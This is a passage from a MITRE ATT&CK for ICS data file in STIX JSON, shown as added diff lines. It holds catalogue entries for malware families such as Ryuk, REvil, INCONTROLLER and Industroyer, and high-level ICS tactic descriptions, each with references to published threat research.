EKANS Ransomware and ICS Operations. Retrieved April 12, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-and-ics-operations/" + }, + { + "source_name": "FireEye OT Ransomware July 2020", + "description": "Nathan Brubaker, Daniel Kapellmann Zafra, Keith Lunden, Ken Proska, Corey Hildebrandt. (2020, July 15). Financially Motivated Actors Are Expanding Access Into OT: Analysis of Kill Lists That Include OT Processes Used With Seven Malware Families. Retrieved April 12, 2021.", + "url": "https://www.fireeye.com/blog/threat-research/2020/07/financially-motivated-actors-are-expanding-access-into-ot.html" + }, + { + "source_name": "Pylos January 2020", + "description": "Joe Slowik. (2020, January 28). Getting the Story Right, and Why It Matters. Retrieved April 12, 2021.", + "url": "https://pylos.co/2020/01/28/getting-the-story-right-and-why-it-matters/" + }, + { + "source_name": "Dragos EKANS June 2020", + "description": "Joe Slowik. (2020, June 18). EKANS Ransomware Misconceptions and Misunderstandings. Retrieved April 12, 2021.", + "url": "https://www.dragos.com/blog/industry-news/ekans-ransomware-misconceptions-and-misunderstandings/#_edn7" + } + ], + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "id": "malware--9e3c9495-5fbd-4676-b3ac-ddecceb57b8f", + "name": "EKANS", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_deprecated": true + }, + { + "labels": [ + "malware" + ], + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_contributors": [ + "The DFIR Report, @TheDFIRReport", + "Matt Brenton, Zurich Insurance Group" + ], + "x_mitre_aliases": [ + "Ryuk" + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "type": "malware", + "id": "malware--a020a61c-423f-4195-8c46-ba1d21abba37", + "created": "2020-05-13T20:14:53.171Z", + "x_mitre_version": "1.3", + "external_references": [ + { + "source_name": "mitre-attack", + "external_id": "S0446", + "url": "https://attack.mitre.org/software/S0446" + }, + { + "source_name": "Ryuk", + "description": "(Citation: CrowdStrike Ryuk January 2019) (Citation: Bleeping Computer - Ryuk WoL) " + }, + { + "source_name": "Bleeping Computer - Ryuk WoL", + "url": "https://www.bleepingcomputer.com/news/security/ryuk-ransomware-uses-wake-on-lan-to-encrypt-offline-devices/", + "description": "Abrams, L. (2021, January 14). Ryuk Ransomware Uses Wake-on-Lan To Encrypt Offline Devices. Retrieved February 11, 2021." + }, + { + "source_name": "FireEye Ryuk and Trickbot January 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/01/a-nasty-trick-from-credential-theft-malware-to-business-disruption.html", + "description": "Goody, K., et al (2019, January 11). A Nasty Trick: From Credential Theft Malware to Business Disruption. Retrieved May 12, 2020." + }, + { + "source_name": "CrowdStrike Ryuk January 2019", + "url": "https://www.crowdstrike.com/blog/big-game-hunting-with-ryuk-another-lucrative-targeted-ransomware/", + "description": "Hanel, A. (2019, January 10). Big Game Hunting with Ryuk: Another Lucrative Targeted Ransomware. Retrieved May 12, 2020." + }, + { + "source_name": "FireEye FIN6 Apr 2019", + "url": "https://www.fireeye.com/blog/threat-research/2019/04/pick-six-intercepting-a-fin6-intrusion.html", + "description": "McKeague, B. et al. (2019, April 5). Pick-Six: Intercepting a FIN6 Intrusion, an Actor Recently Tied to Ryuk and LockerGoga Ransomware. Retrieved April 17, 2019." + } + ], + "x_mitre_deprecated": false, + "revoked": false, + "description": "[Ryuk](https://attack.mitre.org/software/S0446) is a ransomware designed to target enterprise environments that has been used in attacks since at least 2018. [Ryuk](https://attack.mitre.org/software/S0446) shares code similarities with Hermes ransomware.(Citation: CrowdStrike Ryuk January 2019)(Citation: FireEye Ryuk and Trickbot January 2019)(Citation: FireEye FIN6 Apr 2019)", + "modified": "2022-05-24T21:10:44.381Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "name": "Ryuk", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T17:15:44.068Z", + "name": "ACAD/Medre.A", + "description": "[ACAD/Medre.A](https://attack.mitre.org/software/S1000) is a worm that steals operational information. The worm collects AutoCAD files with drawings. [ACAD/Medre.A](https://attack.mitre.org/software/S1000) has the capability to be used for industrial espionage.(Citation: ESET)", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_aliases": [ + "ACAD/Medre.A" + ], + "type": "malware", + "id": "malware--a4a98eab-b691-45d9-8c48-869ef8fefd57", + "created": "2017-05-31T21:32:59.661Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1000", + "external_id": "S1000" + }, + { + "source_name": "ESET", + "description": "ESET ACAD/Medre.A: 10000s of AutoCAD Designs Leaked in Suspected Industrial Espionage Retrieved. 2021/04/13 ", + "url": "https://www.welivesecurity.com/wp-content/uploads/200x/white-papers/ESET_ACAD_Medre_A_whitepaper.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-26T20:06:33.317Z", + "name": "REvil", + "description": "[REvil](https://attack.mitre.org/software/S0496) is a ransomware family that has been linked to the [GOLD SOUTHFIELD](https://attack.mitre.org/groups/G0115) group and operated as ransomware-as-a-service (RaaS) since at least April 2019. [REvil](https://attack.mitre.org/software/S0496), which as been used against organizations in the manufacturing, transportation, and electric sectors, is highly configurable and shares code similarities with the GandCrab RaaS.(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: Group IB Ransomware May 2020)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "2.1", + "x_mitre_contributors": [ + "Edward Millington" + ], + "x_mitre_aliases": [ + "REvil", + "Sodin", + "Sodinokibi" + ], + "type": "malware", + "id": "malware--ac61f1f9-7bb1-465e-9b8a-c2ce8e88baf5", + "created": "2020-08-04T15:06:14.796Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0496", + "external_id": "S0496" + }, + { + "source_name": "Sodin", + "description": "(Citation: Intel 471 REvil March 2020)(Citation: Kaspersky Sodin July 2019)" + }, + { + "source_name": "Sodinokibi", + "description": "(Citation: Secureworks REvil September 2019)(Citation: Intel 471 REvil March 2020)(Citation: G Data Sodinokibi June 2019)(Citation: Kaspersky Sodin July 2019)(Citation: Cylance Sodinokibi July 2019)(Citation: Secureworks GandCrab and REvil September 2019)(Citation: Talos Sodinokibi April 2019)(Citation: McAfee Sodinokibi October 2019)(Citation: McAfee REvil October 2019)(Citation: Picus Sodinokibi January 2020)(Citation: Secureworks REvil September 2019)(Citation: Tetra Defense Sodinokibi March 2020)" + }, + { + "source_name": "Talos Sodinokibi April 2019", + "description": "Cadieux, P, et al (2019, April 30). Sodinokibi ransomware exploits WebLogic Server vulnerability. Retrieved August 4, 2020.", + "url": "https://blog.talosintelligence.com/2019/04/sodinokibi-ransomware-exploits-weblogic.html" + }, + { + "source_name": "Secureworks REvil September 2019", + "description": "Counter Threat Unit Research Team. (2019, September 24). REvil/Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/research/revil-sodinokibi-ransomware" + }, + { + "source_name": "Cylance Sodinokibi July 2019", + "description": "Cylance. (2019, July 3). hreat Spotlight: Sodinokibi Ransomware. Retrieved August 4, 2020.", + "url": "https://threatvector.cylance.com/en_us/home/threat-spotlight-sodinokibi-ransomware.html" + }, + { + "source_name": "Group IB Ransomware May 2020", + "description": "Group IB. (2020, May). Ransomware Uncovered: Attackers’ Latest Methods. Retrieved August 5, 2020.", + "url": "https://www.group-ib.com/whitepapers/ransomware-uncovered.html" + }, + { + "source_name": "G Data Sodinokibi June 2019", + "description": "Han, Karsten. (2019, June 4). Strange Bits: Sodinokibi Spam, CinaRAT, and Fake G DATA. Retrieved August 4, 2020.", + "url": "https://www.gdatasoftware.com/blog/2019/06/31724-strange-bits-sodinokibi-spam-cinarat-and-fake-g-data" + }, + { + "source_name": "Intel 471 REvil March 2020", + "description": "Intel 471 Malware Intelligence team. (2020, March 31). REvil Ransomware-as-a-Service – An analysis of a ransomware affiliate operation. Retrieved August 4, 2020.", + "url": "https://intel471.com/blog/revil-ransomware-as-a-service-an-analysis-of-a-ransomware-affiliate-operation/" + }, + { + "source_name": "Kaspersky Sodin July 2019", + "description": "Mamedov, O, et al. (2019, July 3). Sodin ransomware exploits Windows vulnerability and processor architecture. Retrieved August 4, 2020.", + "url": "https://securelist.com/sodin-ransomware/91473/" + }, + { + "source_name": "McAfee Sodinokibi October 2019", + "description": "McAfee. (2019, October 2). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – What The Code Tells Us. Retrieved August 4, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-what-the-code-tells-us/" + }, + { + "source_name": "Picus Sodinokibi January 2020", + "description": "Ozarslan, S. (2020, January 15). A Brief History of Sodinokibi. Retrieved August 5, 2020.", + "url": "https://www.picussecurity.com/blog/a-brief-history-and-further-technical-analysis-of-sodinokibi-ransomware" + }, + { + "source_name": "McAfee REvil October 2019", + "description": "Saavedra-Morales, J, et al. (2019, October 20). McAfee ATR Analyzes Sodinokibi aka REvil Ransomware-as-a-Service – Crescendo. Retrieved August 5, 2020.", + "url": "https://www.mcafee.com/blogs/other-blogs/mcafee-labs/mcafee-atr-analyzes-sodinokibi-aka-revil-ransomware-as-a-service-crescendo/" + }, + { + "source_name": "Secureworks GandCrab and REvil September 2019", + "description": "Secureworks . (2019, September 24). REvil: The GandCrab Connection. Retrieved August 4, 2020.", + "url": "https://www.secureworks.com/blog/revil-the-gandcrab-connection" + }, + { + "source_name": "Tetra Defense Sodinokibi March 2020", + "description": "Tetra Defense. (2020, March). CAUSE AND EFFECT: SODINOKIBI RANSOMWARE ANALYSIS. Retrieved December 14, 2020.", + "url": "https://www.tetradefense.com/incident-response-services/cause-and-effect-sodinokibi-ransomware-analysis" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-17T16:23:24.812Z", + "name": "INCONTROLLER", + "description": "[INCONTROLLER](https://attack.mitre.org/software/S1045) is custom malware that includes multiple modules tailored towards ICS devices and technologies, including Schneider Electric and Omron PLCs as well as OPC UA, Modbus, and CODESYS protocols. [INCONTROLLER](https://attack.mitre.org/software/S1045) has the ability to discover specific devices, download logic on the devices, and exploit platform-specific vulnerabilities. As of September 2022, some security researchers assessed [INCONTROLLER](https://attack.mitre.org/software/S1045) was developed by CHERNOVITE.(Citation: CISA-AA22-103A)(Citation: Brubaker-Incontroller)(Citation: Dragos-Pipedream)(Citation: Schneider-Incontroller)(Citation: Wylie-22) ", + "x_mitre_platforms": [ + "Field Controller/RTU/PLC/IED", + "Safety Instrumented System/Protection Relay", + "Engineering Workstation", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_contributors": [ + "Jimmy Wylie, Dragos, Inc." + ], + "x_mitre_aliases": [ + "INCONTROLLER", + "PIPEDREAM" + ], + "type": "malware", + "id": "malware--d3aa1058-b1b3-4c29-a3ba-9a9b90ccd93b", + "created": "2022-09-28T20:07:40.272Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S1045", + "external_id": "S1045" + }, + { + "source_name": "PIPEDREAM", + "description": "(Citation: Dragos-Pipedream)(Citation: Wylie-22)" + }, + { + "source_name": "CISA-AA22-103A", + "description": "DHS/CISA. (2022, May 25). Alert (AA22-103A) APT Cyber Tools Targeting ICS/SCADA Devices. Retrieved September 28, 2022.", + "url": "https://www.cisa.gov/uscert/ncas/alerts/aa22-103a" + }, + { + "source_name": "Dragos-Pipedream", + "description": "DRAGOS. (2022, April 13). Pipedream: Chernovite’s Emerging Malware Targeting Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://hub.dragos.com/hubfs/116-Whitepapers/Dragos_ChernoviteWP_v2b.pdf?hsLang=en" + }, + { + "source_name": "Wylie-22", + "description": "Jimmy Wylie. (2022, August). Analyzing PIPEDREAM: Challenges in Testing an ICS Attack Toolkit. Defcon 30.", + "url": "https://media.defcon.org/DEF%20CON%2030/DEF%20CON%2030%20presentations/Jimmy%20Wylie%20-%20Analyzing%20PIPEDREAM%20Challenges%20in%20testing%20an%20ICS%20attack%20toolkit.pdf" + }, + { + "source_name": "Brubaker-Incontroller", + "description": "Nathan Brubaker, Keith Lunden, Ken Proska, Muhammad Umair, Daniel Kapellmann Zafra, Corey Hildebrandt, Rob Caldwell. (2022, April 13). INCONTROLLER: New State-Sponsored Cyber Attack Tools Target Multiple Industrial Control Systems. Retrieved September 28, 2022.", + "url": "https://www.mandiant.com/resources/incontroller-state-sponsored-ics-tool" + }, + { + "source_name": "Schneider-Incontroller", + "description": "Schneider Electric. (2022, April 14). Schneider Electric Security Bulletin: “APT Cyber Tools Targeting ICS/SCADA Devices” . Retrieved September 28, 2022.", + "url": "https://download.schneider-electric.com/files?p_Doc_Ref=SESB-2022-01" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:13:42.357Z", + "name": "KillDisk", + "description": "[KillDisk](https://attack.mitre.org/software/S0607) is a disk-wiping tool designed to overwrite files with random data to render the OS unbootable. It was first observed as a component of [BlackEnergy](https://attack.mitre.org/software/S0089) malware during cyber attacks against Ukraine in 2015. [KillDisk](https://attack.mitre.org/software/S0607) has since evolved into stand-alone malware used by a variety of threat actors against additional targets in Europe and Latin America; in 2016 a ransomware component was also incorporated into some [KillDisk](https://attack.mitre.org/software/S0607) variants.(Citation: KillDisk Ransomware)(Citation: ESEST Black Energy Jan 2016)(Citation: Trend Micro KillDisk 1)(Citation: Trend Micro KillDisk 2)", + "x_mitre_platforms": [ + "Linux", + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "KillDisk", + "Win32/KillDisk.NBI", + "Win32/KillDisk.NBH", + "Win32/KillDisk.NBD", + "Win32/KillDisk.NBC", + "Win32/KillDisk.NBB" + ], + "type": "malware", + "id": "malware--e221eb77-1502-4129-af1d-fe1ad55e7ec6", + "created": "2021-01-20T18:05:07.059Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0607", + "external_id": "S0607" + }, + { + "source_name": "KillDisk Ransomware", + "description": "Catalin Cimpanu. (2016, December 29). KillDisk Disk-Wiping Malware Adds Ransomware Component. Retrieved January 12, 2021.", + "url": "https://www.bleepingcomputer.com/news/security/killdisk-disk-wiping-malware-adds-ransomware-component/" + }, + { + "source_name": "ESEST Black Energy Jan 2016", + "description": "Cherepanov, A.. (2016, January 3). BlackEnergy by the SSHBearDoor: attacks against Ukrainian news media and electric industry. Retrieved May 18, 2016.", + "url": "http://www.welivesecurity.com/2016/01/03/blackenergy-sshbeardoor-details-2015-attacks-ukrainian-news-media-electric-industry/" + }, + { + "source_name": "Trend Micro KillDisk 1", + "description": "Fernando Merces, Byron Gelera, Martin Co. (2018, June 7). KillDisk Variant Hits Latin American Finance Industry. Retrieved January 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/f/new-killdisk-variant-hits-latin-american-financial-organizations-again.html" + }, + { + "source_name": "Trend Micro KillDisk 2", + "description": "Gilbert Sison, Rheniel Ramos, Jay Yaneza, Alfredo Oliveira. (2018, January 15). KillDisk Variant Hits Latin American Financial Groups. Retrieved January 12, 2021.", + "url": "https://www.trendmicro.com/en_us/research/18/a/new-killdisk-variant-hits-financial-organizations-in-latin-america.html" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-20T20:37:50.556Z", + "name": "Industroyer", + "description": "[Industroyer](https://attack.mitre.org/software/S0604) is a sophisticated malware framework designed to cause an impact to the working processes of Industrial Control Systems (ICS), specifically components used in electrical substations.(Citation: ESET Industroyer) [Industroyer](https://attack.mitre.org/software/S0604) was used in the attacks on the Ukrainian power grid in December 2016.(Citation: Dragos Crashoverride 2017) This is the first publicly known malware specifically designed to target and impact operations in the electric grid.(Citation: Dragos Crashoverride 2018)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_contributors": [ + "Dragos Threat Intelligence", + "Joe Slowik - Dragos" + ], + "x_mitre_aliases": [ + "Industroyer", + "CRASHOVERRIDE", + "Win32/Industroyer" + ], + "type": "malware", + "id": "malware--e401d4fe-f0c9-44f0-98e6-f93487678808", + "created": "2021-01-04T20:42:21.997Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0604", + "external_id": "S0604" + }, + { + "source_name": "CRASHOVERRIDE", + "description": "(Citation: Dragos Crashoverride 2017)" + }, + { + "source_name": "Win32/Industroyer", + "description": "(Citation: ESET Industroyer)" + }, + { + "source_name": "ESET Industroyer", + "description": "Anton Cherepanov. (2017, June 12). Win32/Industroyer: A new threat for industrial controls systems. Retrieved December 18, 2020.", + "url": "https://www.welivesecurity.com/wp-content/uploads/2017/06/Win32_Industroyer.pdf" + }, + { + "source_name": "Dragos Crashoverride 2017", + "description": "Dragos Inc.. (2017, June 13). CRASHOVERRIDE Analysis of the Threat to Electric Grid Operations. Retrieved December 18, 2020.", + "url": "https://dragos.com/blog/crashoverride/CrashOverride-01.pdf" + }, + { + "source_name": "Dragos Crashoverride 2018", + "description": "Joe Slowik. (2018, October 12). Anatomy of an Attack: Detecting and Defeating CRASHOVERRIDE. Retrieved December 18, 2020.", + "url": "https://www.dragos.com/wp-content/uploads/CRASHOVERRIDE2018.pdf" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-10-12T17:51:18.408Z", + "name": "Flame", + "description": "[Flame](https://attack.mitre.org/software/S0143) is a sophisticated toolkit that has been used to collect information since at least 2010, largely targeting Middle East countries. (Citation: Kaspersky Flame)", + "x_mitre_platforms": [ + "Windows" + ], + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "enterprise-attack", + "ics-attack" + ], + "x_mitre_version": "1.1", + "x_mitre_aliases": [ + "Flame", + "Flamer", + "sKyWIper" + ], + "type": "malware", + "id": "malware--ff6840c9-4c87-4d07-bbb6-9f50aa33d498", + "created": "2017-05-31T21:33:21.973Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/software/S0143", + "external_id": "S0143" + }, + { + "source_name": "Flame", + "description": "(Citation: Kaspersky Flame)" + }, + { + "source_name": "sKyWIper", + "description": "(Citation: Kaspersky Flame) (Citation: Crysys Skywiper)" + }, + { + "source_name": "Flamer", + "description": "(Citation: Kaspersky Flame) (Citation: Symantec Beetlejuice)" + }, + { + "source_name": "Kaspersky Flame", + "description": "Gostev, A. (2012, May 28). The Flame: Questions and Answers. Retrieved March 1, 2017.", + "url": "https://securelist.com/the-flame-questions-and-answers-51/34344/" + }, + { + "source_name": "Crysys Skywiper", + "description": "sKyWIper Analysis Team. (2012, May 31). sKyWIper (a.k.a. Flame a.k.a. Flamer): A complex malware for targeted attacks. Retrieved September 6, 2018.", + "url": "https://www.crysys.hu/publications/files/skywiper.pdf" + }, + { + "source_name": "Symantec Beetlejuice", + "description": "Symantec Security Response. (2012, May 31). Flamer: A Recipe for Bluetoothache. Retrieved February 25, 2017.", + "url": "https://www.symantec.com/connect/blogs/flamer-recipe-bluetoothache" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "labels": [ + "malware" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:12:52.701Z", + "name": "Inhibit Response Function", + "description": "The adversary is trying to prevent your safety, protection, quality assurance, and operator intervention functions from responding to a failure, hazard, or unsafe state.\n\nInhibit Response Function consists of techniques that adversaries use to hinder the safeguards put in place for processes and products. This may involve the inhibition of safety, protection, quality assurance, or operator intervention functions to disrupt safeguards that aim to prevent the loss of life, destruction of equipment, and disruption of production. These techniques aim to actively deter and prevent expected alarms and responses that arise due to statuses in the ICS environment. Adversaries may modify or update system logic, or even outright prevent responses with a denial-of-service. They may result in the prevention, destruction, manipulation, or modification of programs, logic, devices, and communications. As prevention functions are generally dormant, reporting and processing functions can appear fine, but may have been altered to prevent failure responses in dangerous scenarios. Unlike [Evasion](https://attack.mitre.org/tactics/TA0103), Inhibit Response Function techniques may be more intrusive, such as actively preventing responses to a known dangerous scenario. Adversaries may use these techniques to follow through with or provide cover for [Impact](https://attack.mitre.org/tactics/TA0105) techniques.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "inhibit-response-function", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--298fe907-7931-4fd2-8131-2814dd493134", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0107", + "external_id": "TA0107" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2022-09-29T21:38:48.906Z", + "name": "Privilege Escalation", + "description": "The adversary is trying to gain higher-level permissions.\n\nPrivilege Escalation consists of techniques that adversaries use to gain higher-level permissions on a system or network. Adversaries can often enter and explore a network with unprivileged access but require elevated permissions to follow through on their objectives. Common approaches are to take advantage of system weaknesses, misconfigurations, and vulnerabilities.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "privilege-escalation", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--33752ae7-f875-4f43-bdb6-d8d02d341046", + "created": "2021-04-10T17:32:33.899Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0111", + "external_id": "TA0111" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-08T22:09:46.867Z", + "name": "Lateral Movement", + "description": "The adversary is trying to move through your ICS environment.\n\nLateral Movement consists of techniques that adversaries use to enter and control remote systems on a network. These techniques abuse default credentials, known accounts, and vulnerable services, and may also leverage dual-homed devices and systems that reside on both the IT and OT networks. The adversary uses these techniques to pivot to their next point in the environment, positioning themselves to where they want to be or think they should be. Following through on their primary objective often requires [Discovery](https://attack.mitre.org/tactics/TA0102) of the network and [Collection](https://attack.mitre.org/tactics/TA0100) to develop awareness of unique ICS devices and processes, in order to find their target and subsequently gain access to it. Reaching this objective often involves pivoting through multiple systems, devices, and accounts. Adversaries may install their own remote tools to accomplish Lateral Movement or leverage default tools, programs, and manufacturer set or other legitimate credentials native to the network, which may be stealthier.", + "x_mitre_deprecated": false, + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_shortname": "lateral-movement", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--51c25a9e-8615-40c0-8afd-1da578847924", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "revoked": false, + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0109", + "external_id": "TA0109" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ], + "x_mitre_attack_spec_version": "3.1.0", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5" + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Discovery", + "description": "The adversary is locating information to assess and identify their targets in your environment.\n\nDiscovery consists of techniques that adversaries use to survey your ICS environment and gain knowledge about the internal network, control system devices, and how their processes interact. These techniques help adversaries observe the environment and determine next steps for target selection and Lateral Movement. They also allow adversaries to explore what they can control and gain insight on interactions between various control system processes. Discovery techniques are often an act of progression into the environment which enable the adversary to orient themselves before deciding how to act. Adversaries may use Discovery techniques that result in Collection, to help determine how available resources benefit their current objective. A combination of native device communications and functions, and custom tools are often used toward this post-compromise information-gathering objective.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "discovery", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--696af733-728e-49d7-8261-75fdc590f453", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0102", + "external_id": "TA0102" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-09T18:38:51.471Z", + "name": "Initial Access", + "description": "The adversary is trying to get into your ICS environment.\n\nInitial Access consists of techniques that adversaries may use as entry vectors to gain an initial foothold within an ICS environment. These techniques include compromising operational technology assets, IT resources in the OT network, and external remote services and websites. They may also target third party entities and users with privileged access. In particular, these initial access footholds may include devices and communication mechanisms with access to and privileges in both the IT and OT environments. IT resources in the OT environment are also potentially vulnerable to the same attacks as enterprise IT systems. Trusted third parties of concern may include vendors, maintenance personnel, engineers, external integrators, and other outside entities involved in expected ICS operations. Vendor maintained assets may include physical devices, software, and operational equipment. Initial access techniques may also leverage outside devices, such as radios, controllers, or removable media, to remotely interfere with and possibly infect OT operations.", + "x_mitre_modified_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "x_mitre_domains": [ + "ics-attack" + ], + "x_mitre_version": "1.0", + "x_mitre_attack_spec_version": "2.1.0", + "x_mitre_shortname": "initial-access", + "type": "x-mitre-tactic", + "id": "x-mitre-tactic--69da72d2-f550-41c5-ab9e-e8255707f28a", + "created": "2018-10-17T00:14:20.652Z", + "created_by_ref": "identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5", + "external_references": [ + { + "source_name": "mitre-attack", + "url": "https://attack.mitre.org/tactics/TA0108", + "external_id": "TA0108" + } + ], + "object_marking_refs": [ + "marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168" + ] + }, + { + "modified": "2023-03-08T22:22:09.571Z", + "name": "Impact", + "description": "The adversary is trying to manipulate, interrupt, or destroy your ICS systems, data, and their surrounding environment.\n\nImpact consists of techniques that adversaries use to disrupt, compromise, destroy, and manipulate the integrity and availability of control system operations, processes, devices, and data. These techniques encompass the influence and effects resulting from adversarial efforts to attack the ICS environment or that tangentially impact it. Impact techniques can result in more instantaneous disruption to control processes and the operator, or may result in more long term damage or loss to the ICS environment and related operations. The adversary may leverage [Impair Process Control](https://attack.mitre.org/tactics/TA0106) techniques, which often manifest in more self-revealing impacts on operations, or [Impair Process 